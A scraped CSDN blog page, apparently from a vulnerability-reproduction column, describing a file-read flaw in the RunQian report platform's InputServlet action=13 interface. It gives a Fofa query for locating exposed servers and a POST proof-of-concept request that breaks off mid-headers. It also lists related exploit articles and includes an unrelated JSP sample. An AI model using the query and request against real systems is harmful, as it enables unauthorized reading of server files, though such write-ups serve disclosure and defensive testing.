【漏洞复现】润乾报表InputServlet13文件读取漏洞

最新推荐文章于 2024-07-25 16:28:58 发布
最新推荐文章于 2024-07-25 16:28:58 发布
阅读量256 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138252404
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

本文介绍了润乾报表InputServlet13存在的文件读取漏洞,该漏洞可能导致攻击者获取服务器敏感信息。文章详细讲解了漏洞描述,包括润乾报表产品特性,以及漏洞利用的搜索语法和复现过程。
摘要由CSDN通过智能技术生成

漏洞描述:

润乾报表是一款功能全面且性能卓越的报表产品。它专注于企业级BI产品的研发和推广,通过提供丰富的报表功能和高效的开发工具,帮助用户提升图表的开发效率,节省成本。

润乾报表InputServlet13接口存在文件读取漏洞,攻击者可利用漏洞读取服务器的敏感信息。

搜索语法:

Fofa-Query: body="润乾报表"

漏洞详情:

1.润乾报表产品。

2.漏洞POC:

POST /InputServlet?action=13 HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 79
Connection
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

润乾报表平台 InputServlet 任意文件读取漏洞复现
0xSec
04-15 595
润乾报表平台 InputServlet 接口存在任意文件未经漏洞,未经身份攻击者可通过该漏洞读取系统内部配置文件及敏感数据凭证,使系统处于极不安全状态
Servlet.docx
11-03
- 在 `web.xml` 文件中,`InputServlet` 被配置为 `<servlet-name>inputservlet</servlet-name>`,并且 `<servlet-class>` 是 `com.demo.servlet.InputServlet`,这表明了 `InputServlet` 类的全限定名。...
动态 SQL 及安全性(Birt vs 润乾
cainiao_M的博客
07-29 239
静态 SQL 与动态 SQL 对于题目中提到的动态 SQL,显然应该有一种静态 SQL 与之相对,那么两者应该怎么理解?我们先来个基本的认识。 静态 SQL 之“静态”,意味着在执行之前就已经明确了该 sql 在数据库执行后的业务含义,也就是对于做啥事儿我们是清楚的,只不过需要知道这事儿的具体内容有哪些。比如“select userID,username from users where de...
润乾报表前台InputServlet接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
07-24 373
润乾报表是一个纯JAVA的企业级报表工具,支持对J2EE系统的嵌入式部署,无缝集成。服务器端支持各种常见的操作系统,支持各种常见的关系数据库和各类J2 EE的应用服务器,客户端采用标准纯html方式展现,支持ie和netscape, 润乾报表是领先的企业级报表分析软件。其润乾报表前台InputServlet接口存在任意文件上传漏洞
漏洞复现润乾报表 InputServlet 任意文件上传漏洞
qq_67810151的博客
04-11 871
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 646
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
润乾报表InputServlet存在任意文件上传漏洞
weixin_43167326的博客
04-11 429
润乾报表是一个纯JAVA的企业级报表工具,支持对J2EE系统的嵌入式部署,无缝集成。服务器端支持各种常见的操作系统,支持各种常见的关系数据库和各类J2 EE的应用服务器,客户端采用标准纯html方式展现,支持ie和netscape.
jsp与Servlet跳转实例借鉴.pdf
12-25
web.xml文件中,我们可以看到Servlet的映射,例如InputServlet、ConfirmServlet、ResultServlet。这些映射用于将URL请求映射到对应的Servlet上。 知识点十:JSP页面的错误处理 在Error.jsp中,我们可以看到错误...
jsp与Servlet跳转
11-27
- 代码中通过`<a href="/lianxi/servlet/InputServlet">INPUT</a>`实现了这一功能。 2. **Input.jsp** - 收集用户的输入信息,如用户名和密码。 - 使用POST方法将数据提交给`ConfirmServlet`。 3. **Confirm....
jsp与Servlet跳转实例
10-10
以Index.jsp为例,页面首先设置了一系列元数据,如字符编码、基路径等,然后通过一个链接指向InputServlet,触发后续的流程。当用户点击链接时,会调用InputServlet,该Servlet通常会检查必要的参数,然后重定向到...
润乾报表4.0帮助文档
05-11
润乾报表4.0帮助文档 包括 润乾报表4.0应用开发.pdf 润乾报表4.0实用案例解析.pdf 润乾报表4.0填报专题.pdf 润乾报表4.0用户手册.pdf
漏洞复现】先锋WEB燃气收费系统文件上传漏洞 1day
失心少年
01-12 186
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!访问http://ip:port/AjaxService/Upload.aspx验证。/AjaxService/Upload.aspx 存在任意文件上传漏洞。出现上面页面则证明漏洞存在。
漏洞复现润乾报表InputServlet12文件上传漏洞
晚风不及你
04-27 246
润乾报表InputServlet12接口存在文件上传漏洞,攻击者可利用漏洞获取服务器权限。
HW漏洞威胁情报第二天|HW情报
weixin_43167326的博客
07-24 1710
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!帆软V11 0day sql注入至rce浪潮财务云反序列化rce通达V11.10 前台sql注入金万维异速联云联应用系统GNRemote存在远程命令执行漏洞(已复现
【攻防演练】【含poc】润乾报表dataSphereServlet接口存在任意文件读取漏洞
最新发布
zzxx191z的博客
07-25 230
dataSphereServlet接口任意文件上传,现补充一个dataSphereServlet接口任意文件读取。近期润乾1day已公开,目前发现已有InputServlet接口任意文件上传、读取以及。
漏洞复现润乾报表 servlet/dataSphereServlet 任意文件上传漏洞
qq_67810151的博客
04-23 770
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
润乾报表平台 InputServlet 任意文件上传(含批量验证poc)
weixin_43567873的博客
04-15 148
润乾报表平台 InputServlet 任意文件上传(含批量验证poc)
报表的SQL植入风险及规避方法
cainiao_M的博客
06-28 301
互联网时代带来方便的同时也带来了安全隐患,各种安全问题可说是防不胜防,特别是大家日益关心的个人信息等方面,貌似很难有什么安全和隐私可言。 而在报表作为常用的信息载体,更是直接面临各种安全挑战,例如:SQL 植入。 什么是 SQL 植入?! 报表为啥会有 SQL 植入风险?! 能不能通过报表工具提供的功能避免 SQL 植入?! SQL 植入的概念 首先,认识一下什么是 sql 植入? ...
基于JSP+Servlet+JavaBean的设计模式,设计一个Web应用程序,当用户在提交页面上输入矩形的长和宽,提交后显示出矩形的周长和面积。请给出具体代码
06-02
好的,以下是具体的代码实现: 1. 创建一个名为 Rectangle 的 JavaBean 类,用于计算矩形的周长和面积。 ```java public class Rectangle { private double length; private double width; public Rectangle() {} public Rectangle(double length, double width) { this.length = length; this.width = width; } public double getLength() { return length; } public void setLength(double length) { this.length = length; } public double getWidth() { return width; } public void setWidth(double width) { this.width = width; } public double getArea() { return length * width; } public double getPerimeter() { return 2 * (length + width); } } ``` 2. 创建一个名为 InputServletServlet 类,用于接收用户输入的矩形长和宽,并将其传递给 Rectangle 类进行计算。 ```java import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; public class InputServlet extends HttpServlet { private static final long serialVersionUID = 1L; public InputServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doPost(request, response); } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { double length = Double.parseDouble(request.getParameter("length")); double width = Double.parseDouble(request.getParameter("width")); Rectangle rect = new Rectangle(length, width); request.setAttribute("rect", rect); request.getRequestDispatcher("/output.jsp").forward(request, response); } } ``` 3. 创建一个名为 output.jsp 的 JSP 页面,用于显示计算出的矩形周长和面积。 ```jsp <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>矩形周长和面积</title> </head> <body> <h1>矩形周长和面积</h1> <hr> <p>长:${rect.length}</p> <p>宽:${rect.width}</p> <p>面积:${rect.area}</p> <p>周长:${rect.perimeter}</p> </body> </html> ``` 4. 在 web.xml 文件中配置 InputServlet 类的映射。 ```xml <web-app> <servlet> <servlet-name>InputServlet</servlet-name> <servlet-class>InputServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>InputServlet</servlet-name> <url-pattern>/input</url-pattern> </servlet-mapping> </web-app> ``` 这样,当用户在输入页面上输入矩形的长和宽并提交后,就会显示出矩形的周长和面积。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值